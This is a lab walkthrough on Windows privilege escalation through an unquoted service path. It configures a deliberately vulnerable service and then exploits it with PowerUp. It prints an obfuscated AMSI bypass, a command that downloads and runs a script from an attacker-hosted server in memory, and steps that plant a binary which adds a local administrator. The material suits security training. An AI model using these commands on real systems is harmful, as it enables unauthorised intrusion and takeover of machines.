Unqouted Service Path

We will create a service with a Unquoted Service Path to escalate privileges from a low privileges user account to SYSTEM.

Configuring

1. Login to WS01 as the Administrator user with password Welcome01!.

2. Start PowerShell as administrator and run the following commands to create a service:

• Name = Service

• Executable path = C:\Program Files\bin folder\program\bin x64\Service.exe

• Start = auto

sc.exe create "Service" binpath= "C:\Program Files\bin folder\program\bin x64\Service.exe" start= auto

3. Run the following command to create the folders for the service:

mkdir "C:\Program Files\bin folder\program\bin x64"

4. Run icacls to check the current permissions on the directories with a space in it:

icacls.exe "C:\Program Files\bin folder"
icacls.exe "C:\Program Files\bin folder\program\bin x64"

Currently the low privileged users can't create any files in the directories with a space. BUILTIN\Users has (RX) privileges. Which is RX (read and execute access). For more information about the icacls access rights check out this SuperUser post.

5. Run icacls to give the BUILTIN\Users write permissions on C:\Program Files\bin folder\program.

icacls.exe "C:\Program Files\bin folder\program" /grant BUILTIN\Users:W

6. Run icacls again the check the permissions on the directory:

icacls.exe "C:\Program Files\bin folder\program"

Attacking

How it works

When a service exists whose executable path contains spaces and it isn't enclosed within quotes it could be used to run an executable of our choice. This is because if the service is not enclosed within quotes and it has spaces, it would handle the space as a break and pass the rest of the service path as an argument.

If the filename is a long string of text which contains spaces, and is not enclosed within quotation marks, the filename will be executed in the order from left to right until the space is reached and will append .exe at the end of this spaced path. For example, consider we have the following path:

C:\Program Files\A Folder\B Folder\C Folder\Program.exe

Windows will try to execute the following:

1. C:\Program Files\A.exe

2. C:\Program Files\A Folder\B.exe

3. C:\Program Files\A Folder\B Folder\C.exe

4. C:\Program Files\A Folder\B Folder\C Folder\Program.exe

Tools

• Icacls.exe

• PowerUp

Executing the attack

Powerup

1. Download PowerUp on your attacking machine and host it on a webserver

wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
python3 -M http.server 8090

2. Login on WS01 with the user John and the password Welcome2022!.

evil-winrm -i 10.0.0.128 -u john -p 'Welcome2022!'

3. Open Powershell, execute a amsi bypass such ass the one below and download PowerUp into memory with iex and iwr (Invoke-Expression and Invoke-WebRequest)

S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
iex (iwr http://192.168.248.2:8090/PowerUp.ps1 -usebasicparsing)

4. Execute Invoke-AllChecks to run all the checks from PowerUp.

5. The output tells us there is a service with the name Service and it has a unqouted service path (C:\Program Files\bin folder\program\bin x64\service.exe).

6. To check if we can write a binary in one of the folders check the permissions the folders before the one with a space in it. Since we need to write the binaries C:\Program Files\bin.exe or C:\Program Files\bin folder\program\bin.exe.

icacls.exe "C:\Program Files"
icacls.exe "C:\Program Files\bin folder\program"

We have no write permissions in C:\Program Files:

But we do have write permissions in C:\Program Files\bin folder\program.

7. To abuse this run the following command from PowerUp, which will create a executable bin.exe in the path C:\Program Files\bin folder\program which will add a new local administrator.

Write-ServiceBinary -ServiceName 'Service' -ServicePath 'C:\Program Files\bin folder\program\bin.exe' -Username 'privesc' -Password "Welcome2022!" 

8. Our current user can't start the service, which means we should restart the machine and check if the user privesc is created.

9. Start a new PowerShell session as Administrator and fill in the credentials privesc:Welcome2022!.

Cleanup

Remove the user privesc and the binary

Remove-Item C:\Program Files\bin folder\program\bin.exe
net user privesc /del

Defending

Recommendations

• Periodically check for vulnerable services and directory permissions.

Detection

References

Windows Privilege Escalation — Part 1 (Unquoted Service Path)Medium

Explain the output of ICACLS.EXE, line by line, item by itemSuper User

https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1